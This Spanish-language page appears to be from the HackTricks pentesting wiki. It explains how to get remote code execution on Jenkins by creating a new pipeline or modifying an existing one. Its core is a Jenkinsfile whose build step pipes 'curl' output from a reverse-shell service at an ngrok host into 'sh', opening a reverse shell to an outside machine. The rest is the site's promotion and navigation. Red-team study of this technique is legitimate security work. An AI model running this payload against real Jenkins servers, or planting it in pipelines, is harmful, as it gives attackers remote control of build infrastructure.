Jenkins RCE Creating/Modifying Pipeline

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.

Creando un nuevo Pipeline

En "Nuevo Elemento" (accesible en /view/all/newJob) selecciona Pipeline:

En la sección de Pipeline escribe el reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Finalmente, haz clic en Guardar y Construir ahora y la canalización se ejecutará:

Modificando una Canalización

Si puedes acceder al archivo de configuración de alguna canalización configurada, podrías modificarlo añadiendo tu reverse shell y luego ejecutarlo o esperar a que se ejecute.

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

PreviousJenkins RCE Creating/Modifying Project NextJenkins Arbitrary File Read to RCE via "Remember Me"

Last updated 1 month ago